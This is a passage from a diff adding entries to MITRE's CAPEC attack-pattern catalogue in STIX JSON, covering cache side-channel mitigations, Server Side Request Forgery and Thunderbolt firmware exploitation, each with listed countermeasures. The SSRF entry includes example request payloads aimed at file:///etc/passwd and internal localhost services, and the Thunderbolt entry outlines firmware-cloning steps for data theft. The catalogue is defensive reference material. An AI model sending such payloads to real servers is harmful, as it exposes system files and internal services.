"attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable SharedArrayBuffer for Web Browsers", + "id": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--183b50f2-3b70-46cf-94a6-bfa6c657652d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Copy-on-Write between Cloud VMs", + "id": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9cc3819-f8ef-4590-96ab-5d9ddb6a9bb6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Privilege Checks on Cache Flush Instructions", + "id": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224b0c6b-54cf-408c-9215-be2bc2bb613b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks", + "id": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.\n ", + "external_references": [ + { + "external_id": "CAPEC-664", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-918", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/918.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "OWASP SSRF Bible, 2017--01---26, OWASP", + "external_id": "REF-644", + "source_name": "reference_from_CAPEC", + "url": "https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf" + }, + { + "description": "Server Side Request Forgery, PortSwigger", + "external_id": "REF-645", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/ssrf" + }, + { + "description": "CallStranger Vulnerability, 2020--06---08, Yunus Cadirici", + "external_id": "REF-646", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/yunuscadirci/CallStranger" + } + ], + "id": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Server Side Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009", + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c", + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Availability": [ + "Modify Data", + "Resource Consumption" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory\n \n A malicious user can modify the request URL to look like this instead:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://localhost/server-status\n \n or\n \n vulnerableService = file:///etc/passwd\n \n or\n \n vulnerableService=dict://localhost:12345/info\n \n If the exploit is successful, the server may return the data requested by the adversary\n \n root:!:0:0::/:/usr/bin/ksh\n daemon:!:1:1::/etc:\n bin:!:2:2::/bin:\n sys:!:3:3::/usr/sys:\n adm:!:4:4::/var/adm:\n uucp:!:5:5::/usr/lib/uucp:\n guest:!:100:100::/home/guest:\n nobody:!:4294967294:4294967294::/:\n lpd:!:9:4294967294::/:\n lp:*:11:11::/var/spool/lp:/bin/false\n invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n paul:!:201:1::/home/paul:/usr/bin/ksh\n jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh\n \n ", + "\n The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment

  1. Examine existing application requests: Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application's protection to Server Side Request Forgery

    2. Techniques
    Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
    Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
    Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.

Exploit

  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server must be running a web application that processes HTTP requests." + ], + "x_capec_resources_required": [ + "[None] No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.", + "Medium": "The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.", + "id": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6377c3e9-f7ce-470a-935c-754995e66989", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df4b3787-fb80-4016-b3ec-7b279539e710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.", + "id": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--814c7fba-41b2-4ab4-b0a9-1c73b58b395f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.", + "id": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fab9925e-dd41-45aa-bae8-f2d7f2595513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented.", + "id": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.\n ", + "external_references": [ + { + "external_id": "CAPEC-665", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/665.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-1188", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1188.html" + }, + { + "external_id": "CWE-862", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/862.html" + }, + { + "description": "Exploitation for Defensive Evasion", + "external_id": "T1211", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1211" + }, + { + "description": "Pre-OS Boot: Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "Modify Authentication Process", + "external_id": "T1556", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556" + }, + { + "description": "Björn Ruytenberg, Thunderspy When Lighting Strikes Thrice: Breaking Thunderbolt 3 Security, 2020, Eindhoven University of Technology", + "external_id": "REF-647", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/" + }, + { + "description": "Björn Ruytenberg, Breaking Thunderbolt Protocol Security: Vulnerability Report, 2020--04---17, Eindhoven University of Technology", + "external_id": "REF-648", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/assets/reports/breaking-thunderbolt-security-bjorn-ruytenberg-20200417.pdf" + }, + { + "description": "Liam Tung, Thunderbolt flaws affect millions of computers – even locking unattended devices won't help, 2020--05---11, ZDNet", + "external_id": "REF-649", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/thunderbolt-flaws-affect-millions-of-computers-even-locking-unattended-devices-wont-help/" + }, + { + "description": "Liam Tung, Microsoft: Worried about Thunderbolt attacks? Get a Windows 10 Secured-Core PC, 2020--05---14, ZDNet", + "external_id": "REF-650", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/microsoft-worried-about-thunderbolt-attacks-get-a-windows-10-secured-core-pc/" + }, + { + "description": "Jon Porter, Thunderbolt flaw allows access to a PC’s data in minutes, 2020--05---11, The Verge", + "external_id": "REF-651", + "source_name": "reference_from_CAPEC", + "url": "https://www.theverge.com/2020/5/11/21254290/thunderbolt-security-vulnerability-thunderspy-encryption-access-intel-laptops" + }, + { + "description": "Jerry Bryant, MORE INFORMATION ON THUNDERBOLT(TM) SECURITY, 2020--05---10, Intel Corporation", + "external_id": "REF-652", + "source_name": "reference_from_CAPEC", + "url": "https://blogs.intel.com/technology/2020/05/more-information-on-thunderspy/#gs.0o6pmk" + } + ], + "id": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Thunderbolt Protection Flaws", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary's own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary's own system to copy, parse, and modify the victim's Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary's Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey physical victim environment and potential Thunderbolt system targets: The adversary monitors the target's physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state.

  2. Evaluate the target system and its Thunderbolt interface: The adversary determines the device's operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack.

Experiment

  1. Obtain and/or clone firmware image: The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller's SPI (Serial Peripheral Interface) flash.

    2. Techniques
    Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.
    Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.
    Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device.

  2. Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information: The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.

    3. Techniques
    Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.
    Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.
    Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.
    Locate data structure containing challenge-response key information between appropriate offsets.

  3. Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary): The adversary overrides the target device's Thunderbolt Security Level to \"None\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.

    4. Techniques
    The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections.

  4. Modify/replace victim Thunderbolt firmware image: The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash.

Exploit

  1. Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions: The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.

    2. Techniques
    Observe victim device identify adversary device as the victim device and enables PCIe tunneling.
    Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.
    Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \"None\" (SL0)
    Observe after installation of Firmware update that within Thunderbolt Management UI the \"NVM version\" is unchanged/same prior to the prompt of successful Firmware update/installation.

  2. Exfiltration of desired data from victim device to adversary device: Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_peer_of_refs": [ + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_prerequisites": [ + "The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections." + ], + "x_capec_resources_required": [ + "SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.", + "Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.", + "Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Kernel Direct Memory Access Protection", + "id": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a0e0f629-1901-46f1-84f7-14f999416101", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface", + "id": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8cd41ad-b8ed-421f-9327-7fd7d7f1bb72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface", + "id": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92fe9893-60f3-4669-b1b1-49ee6fe775e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode", + "id": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5186383a-023d-4ef1-918a-0f11c9d14b4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Set Security Level to SL3 for 